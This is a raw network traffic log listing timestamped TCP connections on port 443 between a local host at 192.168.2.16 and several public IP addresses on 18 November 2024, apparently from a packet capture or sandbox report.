                                                                                                                                                                                            Nov 18, 2024 21:00:10.876796007 CET44349834151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.878254890 CET44349834151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.878317118 CET49834443192.168.2.16151.101.65.140
                                                                                                                                                                                            Nov 18, 2024 21:00:10.879405022 CET49834443192.168.2.16151.101.65.140
                                                                                                                                                                                            Nov 18, 2024 21:00:10.879487038 CET44349834151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.879646063 CET49834443192.168.2.16151.101.65.140
                                                                                                                                                                                            Nov 18, 2024 21:00:10.879662037 CET44349834151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.880261898 CET44349828184.28.90.27192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.880353928 CET49828443192.168.2.16184.28.90.27
                                                                                                                                                                                            Nov 18, 2024 21:00:10.881525993 CET49828443192.168.2.16184.28.90.27
                                                                                                                                                                                            Nov 18, 2024 21:00:10.881540060 CET44349828184.28.90.27192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.881865978 CET44349828184.28.90.27192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.883395910 CET49828443192.168.2.16184.28.90.27
                                                                                                                                                                                            Nov 18, 2024 21:00:10.891433954 CET44349829104.244.42.67192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.891521931 CET44349829104.244.42.67192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.891664028 CET49829443192.168.2.16104.244.42.67
                                                                                                                                                                                            Nov 18, 2024 21:00:10.891849041 CET49829443192.168.2.16104.244.42.67
                                                                                                                                                                                            Nov 18, 2024 21:00:10.891870022 CET44349829104.244.42.67192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.899383068 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.899410963 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.899466038 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.899887085 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.900007010 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.900824070 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.900897026 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.905215979 CET4434983366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.905446053 CET49833443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.905467033 CET4434983366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.905917883 CET4434983366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.906238079 CET49833443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.906317949 CET4434983366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.906529903 CET49833443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.907707930 CET49840443192.168.2.16172.202.163.200
                                                                                                                                                                                            Nov 18, 2024 21:00:10.907773972 CET44349840172.202.163.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.907896042 CET49840443192.168.2.16172.202.163.200
                                                                                                                                                                                            Nov 18, 2024 21:00:10.909112930 CET49840443192.168.2.16172.202.163.200
                                                                                                                                                                                            Nov 18, 2024 21:00:10.909147024 CET44349840172.202.163.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.929672003 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.929754019 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.929765940 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.929835081 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.929989100 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.930017948 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.930047989 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.930071115 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.931332111 CET44349828184.28.90.27192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.931885958 CET44349825173.194.76.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.932379007 CET49825443192.168.2.16173.194.76.157
                                                                                                                                                                                            Nov 18, 2024 21:00:10.932439089 CET44349825173.194.76.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.932495117 CET49825443192.168.2.16173.194.76.157
                                                                                                                                                                                            Nov 18, 2024 21:00:10.933149099 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.933182001 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.933253050 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.933589935 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.933610916 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.934365988 CET49834443192.168.2.16151.101.65.140
                                                                                                                                                                                            Nov 18, 2024 21:00:10.947335958 CET4434983366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.962917089 CET4434983174.125.206.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.963115931 CET49831443192.168.2.1674.125.206.157
                                                                                                                                                                                            Nov 18, 2024 21:00:10.963126898 CET4434983174.125.206.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.964586020 CET4434983174.125.206.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.964653015 CET49831443192.168.2.1674.125.206.157
                                                                                                                                                                                            Nov 18, 2024 21:00:10.964934111 CET49831443192.168.2.1674.125.206.157
                                                                                                                                                                                            Nov 18, 2024 21:00:10.965012074 CET4434983174.125.206.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.965049982 CET49831443192.168.2.1674.125.206.157
                                                                                                                                                                                            Nov 18, 2024 21:00:10.966378927 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                            Nov 18, 2024 21:00:11.006607056 CET44349834151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.006678104 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.006757021 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.006772041 CET44349834151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.006843090 CET49834443192.168.2.16151.101.65.140
                                                                                                                                                                                            Nov 18, 2024 21:00:11.006870031 CET44349834151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.006905079 CET49834443192.168.2.16151.101.65.140
                                                                                                                                                                                            Nov 18, 2024 21:00:11.006930113 CET49834443192.168.2.16151.101.65.140
                                                                                                                                                                                            Nov 18, 2024 21:00:11.007261992 CET49842443192.168.2.16151.101.65.140
                                                                                                                                                                                            Nov 18, 2024 21:00:11.007297993 CET44349842151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.007375956 CET49842443192.168.2.16151.101.65.140
                                                                                                                                                                                            Nov 18, 2024 21:00:11.007565975 CET49842443192.168.2.16151.101.65.140
                                                                                                                                                                                            Nov 18, 2024 21:00:11.007582903 CET44349842151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.007985115 CET4434983066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.008008003 CET4434983066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.008065939 CET49830443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.008070946 CET4434983066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.008109093 CET49830443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.008713007 CET49830443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.008725882 CET4434983066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.011354923 CET4434983174.125.206.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.011990070 CET44349818103.52.144.214192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.012213945 CET49818443192.168.2.16103.52.144.214
                                                                                                                                                                                            Nov 18, 2024 21:00:11.012233019 CET44349818103.52.144.214192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.013354063 CET49831443192.168.2.1674.125.206.157
                                                                                                                                                                                            Nov 18, 2024 21:00:11.013366938 CET4434983174.125.206.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.013762951 CET44349818103.52.144.214192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.013824940 CET49818443192.168.2.16103.52.144.214
                                                                                                                                                                                            Nov 18, 2024 21:00:11.014110088 CET49818443192.168.2.16103.52.144.214
                                                                                                                                                                                            Nov 18, 2024 21:00:11.014192104 CET44349818103.52.144.214192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.014209032 CET49818443192.168.2.16103.52.144.214
                                                                                                                                                                                            Nov 18, 2024 21:00:11.019079924 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.019164085 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.019623041 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.019702911 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.020246983 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.020324945 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.021142006 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.021215916 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.021894932 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.021965981 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.022089958 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.022145987 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.022156954 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.022222042 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.022322893 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.022334099 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.022351027 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.022366047 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.022377968 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.025242090 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.025341034 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.025418043 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.025620937 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.025651932 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.059355974 CET44349818103.52.144.214192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.063543081 CET49818443192.168.2.16103.52.144.214
                                                                                                                                                                                            Nov 18, 2024 21:00:11.063543081 CET49831443192.168.2.1674.125.206.157
                                                                                                                                                                                            Nov 18, 2024 21:00:11.063563108 CET44349818103.52.144.214192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.064476967 CET44349827142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.099272966 CET4434983366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.099332094 CET4434983366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.099390984 CET49833443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.099411011 CET4434983366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.099498034 CET49833443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.099924088 CET49833443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.099973917 CET4434983366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.100136042 CET4434983366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.100203037 CET49833443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.100203037 CET49833443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.109388113 CET49818443192.168.2.16103.52.144.214
                                                                                                                                                                                            Nov 18, 2024 21:00:11.109394073 CET49827443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:11.109411001 CET44349827142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.109630108 CET49827443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:11.109678984 CET44349827142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.109734058 CET49827443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:11.129331112 CET44349828184.28.90.27192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.129484892 CET44349828184.28.90.27192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.129549026 CET49828443192.168.2.16184.28.90.27
                                                                                                                                                                                            Nov 18, 2024 21:00:11.130625010 CET49828443192.168.2.16184.28.90.27
                                                                                                                                                                                            Nov 18, 2024 21:00:11.130644083 CET44349828184.28.90.27192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.130656958 CET49828443192.168.2.16184.28.90.27
                                                                                                                                                                                            Nov 18, 2024 21:00:11.130662918 CET44349828184.28.90.27192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.209005117 CET4434983174.125.206.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.251405954 CET49831443192.168.2.1674.125.206.157
                                                                                                                                                                                            Nov 18, 2024 21:00:11.251429081 CET4434983174.125.206.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.251758099 CET49831443192.168.2.1674.125.206.157
                                                                                                                                                                                            Nov 18, 2024 21:00:11.251806021 CET4434983174.125.206.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.251898050 CET49831443192.168.2.1674.125.206.157
                                                                                                                                                                                            Nov 18, 2024 21:00:11.274328947 CET4434983766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.274605036 CET49837443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.274621964 CET4434983766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.275099039 CET4434983766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.275461912 CET49837443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.275542021 CET4434983766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.275702000 CET49837443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.281246901 CET4434983594.141.120.12192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.281497955 CET49835443192.168.2.1694.141.120.12
                                                                                                                                                                                            Nov 18, 2024 21:00:11.281514883 CET4434983594.141.120.12192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.282572031 CET4434983594.141.120.12192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.282659054 CET49835443192.168.2.1694.141.120.12
                                                                                                                                                                                            Nov 18, 2024 21:00:11.283628941 CET49835443192.168.2.1694.141.120.12
                                                                                                                                                                                            Nov 18, 2024 21:00:11.283699036 CET4434983594.141.120.12192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.283778906 CET49835443192.168.2.1694.141.120.12
                                                                                                                                                                                            Nov 18, 2024 21:00:11.283792019 CET4434983594.141.120.12192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.319356918 CET4434983766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.322494030 CET44349836157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.322839975 CET49836443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:11.322854996 CET44349836157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.323498964 CET4434983866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.323721886 CET49838443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.323757887 CET4434983866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.324258089 CET4434983866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.324467897 CET44349836157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.324542999 CET49836443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:11.324620008 CET49838443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.324709892 CET4434983866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.324942112 CET49836443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:11.325026035 CET44349836157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.325117111 CET49838443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.325153112 CET49836443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:11.325162888 CET44349836157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.331502914 CET49835443192.168.2.1694.141.120.12
                                                                                                                                                                                            Nov 18, 2024 21:00:11.367337942 CET4434983866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.378367901 CET49836443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:11.412611008 CET44349818103.52.144.214192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.416743040 CET44349818103.52.144.214192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.416820049 CET49818443192.168.2.16103.52.144.214
                                                                                                                                                                                            Nov 18, 2024 21:00:11.417076111 CET49818443192.168.2.16103.52.144.214
                                                                                                                                                                                            Nov 18, 2024 21:00:11.417104959 CET44349818103.52.144.214192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.468943119 CET4434983766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.469122887 CET4434983766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.469464064 CET49837443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.469583988 CET49837443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.469619989 CET4434983766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.494179010 CET44349839157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.494415998 CET49839443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:11.494435072 CET44349839157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.495914936 CET44349839157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.495991945 CET49839443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:11.496310949 CET49839443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:11.496391058 CET44349839157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.496437073 CET49839443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:11.519673109 CET4434983866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.519695997 CET4434983866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.519758940 CET49838443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.519782066 CET4434983866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.537384033 CET49839443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:11.537391901 CET44349839157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.569394112 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                            Nov 18, 2024 21:00:11.569396019 CET49838443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.585395098 CET49839443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:11.597109079 CET44349836157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.597191095 CET44349836157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.597260952 CET49836443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:11.597433090 CET4434983866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.597495079 CET49838443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.597513914 CET4434983866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.597527981 CET4434983866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.597568035 CET49838443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.597810030 CET49838443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.597825050 CET4434983866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.598376036 CET49836443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:11.598393917 CET44349836157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.629904032 CET44349842151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.630162954 CET49842443192.168.2.16151.101.65.140
                                                                                                                                                                                            Nov 18, 2024 21:00:11.630242109 CET44349842151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.631305933 CET44349842151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.631609917 CET49842443192.168.2.16151.101.65.140
                                                                                                                                                                                            Nov 18, 2024 21:00:11.631742001 CET49842443192.168.2.16151.101.65.140
                                                                                                                                                                                            Nov 18, 2024 21:00:11.631750107 CET44349842151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.631848097 CET44349842151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.662808895 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.663213015 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.663244963 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.663285971 CET44349840172.202.163.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.663378954 CET49840443192.168.2.16172.202.163.200
                                                                                                                                                                                            Nov 18, 2024 21:00:11.666276932 CET49840443192.168.2.16172.202.163.200
                                                                                                                                                                                            Nov 18, 2024 21:00:11.666294098 CET44349840172.202.163.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.666928053 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.667006969 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.667335987 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.667481899 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.667488098 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.667516947 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.668225050 CET44349840172.202.163.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.681411028 CET49842443192.168.2.16151.101.65.140
                                                                                                                                                                                            Nov 18, 2024 21:00:11.713393927 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.713423014 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.713432074 CET49840443192.168.2.16172.202.163.200
                                                                                                                                                                                            Nov 18, 2024 21:00:11.736821890 CET49840443192.168.2.16172.202.163.200
                                                                                                                                                                                            Nov 18, 2024 21:00:11.738568068 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.738841057 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.738856077 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.739978075 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.740720034 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.740897894 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.740902901 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.763367891 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.767894030 CET4434983594.141.120.12192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.767962933 CET4434983594.141.120.12192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.768049955 CET49835443192.168.2.1694.141.120.12
                                                                                                                                                                                            Nov 18, 2024 21:00:11.769062996 CET49835443192.168.2.1694.141.120.12
                                                                                                                                                                                            Nov 18, 2024 21:00:11.769098997 CET4434983594.141.120.12192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.779376030 CET44349840172.202.163.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.787372112 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.787894011 CET49844443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:11.787924051 CET44349844188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.787992001 CET49844443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:11.788382053 CET49844443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:11.788394928 CET44349844188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.793374062 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.839600086 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                            Nov 18, 2024 21:00:11.841711044 CET44349839157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.841875076 CET44349839157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.842075109 CET49839443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:11.842094898 CET44349839157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.842140913 CET44349839157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.842206001 CET49839443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:11.842212915 CET44349839157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.843256950 CET49839443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:11.843379021 CET44349839157.240.253.35192.168.2.16
